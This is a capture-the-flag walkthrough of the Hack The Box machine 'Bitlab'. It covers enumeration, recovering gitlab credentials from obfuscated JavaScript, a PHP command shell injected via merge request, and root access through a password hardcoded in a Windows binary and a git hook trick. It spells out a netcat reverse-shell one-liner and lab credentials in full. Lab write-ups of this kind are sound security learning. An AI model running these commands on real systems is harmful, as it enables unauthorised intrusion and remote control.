# BITLAB | 10.10.10.114

## Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial 10.10.10.114

![nmap results](img/ports-nmap.png)

### Ports and Services

#### 22 - SSH - OpenSSH 7.6p1 Ubuntu

Standard SSH setup - I'll come back and try to login if I find credentials.

#### 80 - HTTP - nginx hosting an instance of Gitlab

At first the page said it was not responding, but I think that was because I was moving too quickly and the system was still configuring:

![Homepage](img/port-80.png)

I tried running gobuster, but there are false positives. There is a rather robust robots.txt file, helpfully directing me for what to check. Most of those links redirect to the gitlab login page. One that stood out as unusual was the `/help` directory:

![/help](img/help.png)

It is weird that there is a bookmarks page there, kind of out of place, don't you think?

![bookmarks.html](img/bookmarks.png)

At first it seemed pretty harmless, but then I hovered over the 'Gitlab login' link and noticed something unusual about the code there:

![obfuscated javascript](img/hex.png)

That is obfuscated, in what appears to be hex, so I copied the entire link and pasted it into a [decoder](http://ddecode.com/hexdecoder/):

![decoded](img/decoded-js.png)

So now we have a username of 'clave' and a password of '11des0081x'. I quickly tried these creds on SSH but no dice.

![bitlab home](img/login.png)

The creds do work for logging into the website however.

One of the repos looks to be a simple profile page for the user, which can actually be found at `/profile`. The other one is more interesting, in that it has some php code that even I recognize, and a clue that 'git' is running as root on the machine:

![index.php](img/deployer-index-php.png)

There is the 'shell_exec' code there, which does what it says on the box: executes shell code. I'm sure that I am supposed to use this somehow, but at the moment, I am not quite sure how.

I also found a code snippet saved by the user:

![snippet](img/snippet.png)

It looks to be database credentials. But for localhost only, so if I get shell then these might come in handy later.

## Exploitation - shell via PHP code execution

Since I don't know the location of the index.php file with the webhook code, but I _do_ know the location of the other one (it's at `/profile`), I'll see if I can add code to the page on gitlab and merge the change. If the page is running directly from gitlab then the changes will show up live.

I added the following code right after the `<body>` tag for the index.php file:

![simple php command shell](img/codeinject.png)

Then I went through the commit and merge request, making sure I created a new branch but having it be removed after the merge goes through. Then I refreshed the `/profile/index.php` page and saw that my code was in fact there:

![php code](img/code.png)

It is throwing an error because I did not issue any commands. If I try appending `?cmd=whoami` to the address, I get a response:

![I am www-data](img/whoami.png)

OK - so I should be able to get the system to make a connection back to me, using netcat.

I tried a lot of versions of reverse connections and one worked:

    rm /tmp/l;mknod /tmp/l p;/bin/sh 0</tmp/l | nc 10.10.14.29 6969 1>/tmp/l
    
![www-data shell](img/www-data-shell.png)

As the www-data user, I am not able to read the clave user's flag, so I'll have to privesc first.

## Privilege Escalation - www-data > clave

**Output of sudo -l:**

![sudo -l](img/sudo-l.png)

The clave user is running a lot of weird git-related stuff:

![clave git](img/clave-git.png)

root is running a docker instance. If clave is in the docker group and I can privesc to them, I have a relatively easy privesc to root.

![root running docker](img/root-docker.png)

I ran an internal nmap scan and found that there is another webserver (Apache) running internally on port 8000:

![internal nmap scan](img/internal-nmap.png)

Aaaand, there is a second instance of SSH running internally on port 3022:

![second instance of SSH](img/ssh.png)

There's a lot going on here. But let's not get distracted. Since the www-data user is allowed to run git as root, that seems like something worth pursuing. If I check [GTFObins](https://gtfobins.github.io/gtfobins/git/) I can see that there are several ways to potentially leverage this.

![GTFObins git](img/gtfo.png)

Now, a) is out of the question, because our user cannot modify what the PAGER is. In fact, looking at these more closely, I am not sure if any of these will apply, since the user is only able to do `sudo git pull` and not `sudo git <anything>` so this is off the table until I can puzzle it out.

The apache server running on port 8000 is a mirror of the one that is externally accessible. It is probably some proxy thing that I don't understand.

Speaking of things I don't understand, there is also a whole other network on this box, as shown by grabbing the netstat output:

![netstat](img/network.png)

This is related to the docker containers I bet. Running `arp -e` shows me that there are at least two containers running:

![arp -e](img/arp.png)

A scan of the subnet shows the postgresql service running on 172.19.0.4 - and I have credentials for it.

The box does not actually have the postfresql client - so I'll set up a port forward using chisel to connect to the service from my machine:

![chisel server](img/chiselserver.png)

![chisel client](img/chiselclient.png)

Now I can connect from my machine:

![postgres connection](img/pgconnect.png)

There are several databases that I can use:

![postgres database listing](img/pgdatabases.png)

Typing `\dt` lists all the tables in this database - there is just the one:

![table list](img/table.png)

The command `select * from profiles;` will grab everything from that table:

![clave password](img/clave-pass.png)

It looks to be base64-encoded, and after running it through a decoder I get 'ssh-str0ng-p@ss'.

Let's try that and see if we can login:

![permission denied](img/denied.png)

Hot tip: always try every password you get, even if it is base64-encdoded. The original string actually is his password:

![clave SSH session](img/clave-shell.png)

#### Flag

![user flag](img/user-flag.png)

## Privilege Escalation - clave > root

Now, clave is a real user with console, but is not allowed to run sudo on the box, so privesc has to come from somewhere else. They are not in the docker group so cannot run a typical docker privesc. The only thing out of place here is that 'RemoteConnection.exe' - a Windows binary on a Linux computer. So I bring it over to my system to attempt to debug.

At least I can run `strings` on it without having to pull my hair out trying to get a debugger to work on my system:

![strings output](img/strings.png)

There is a reference there to "Access denied", a string that I thought was base64-encoded (it's not) and something called "ShellExecuteW" which is probably what I am looking for.

After spending an hour trying to look at this first in gdb and then in edb, I saw that someone else used "ollydbg", so that's what I did. I have used it before on a Windows binary for another HTB machine. I would not have know what to search for without a writeup however. I right-clicked and selected 'Search for >> All referenced strings'.

This brought up a windows with just a few things in it, but something that stood out quite a bit - a reference to PuTTY, which is an SSH program for Windows.

![PuTTY](img/putty.png)

Then I had to set a breakpoint just before the mention of 'clave' in the code (highlight the line and press F2), and run the program (F9).

The point at which is stops is the breakpoint I set earlier, and in the "Registers" module of ollydbg I see what appears to be a hardcoded ssh password for root:

![root pw](img/root-pw.png)

OK then, let's try that out:

![root shell](img/root-shell.png)

#### Flag

![root flag](img/root-flag.png)

## Conclusion

This one was hard once I got an initial foothold. There were a lot of things going on on this box, which makes enumeration a challenge. The docker situation is one I have not encountered before, so that was weird. And I don't really understand why there was a Windows binary on the box because there was no way for it to be run from there - no Wine install at all - but I guess I learned that I may need some more components/libraries to get things to work properly. The exe was broken on my system, running through Wine. But I guess the lesson here is to not hardcode credentials, because nearly everything can be reversed.

**Steps taken:**

* Discover gitlab credentials in obfuscated javascript code, log in
* Modify live webpage to execute malicious PHP code, get reverse shell as www-data
* Find SSH password for clave in Postgresql db, login as clave
* Privesc by finding hardcoded SSH creds in Windows binary

## Small update

I just watched ippsec's video on this, and it turns out there is a way to abuse sudo access to git - through hooks. It was real clever. He copied the repo to a writable directory, which changes the permissions from root to current user. Then he added a hook called 'post-merge' to the hooks directory (see `man githooks`) and put a call for a reverse shell into it. Then made a change to the repo and did `sudo git pull` and he was root. Pretty cool.
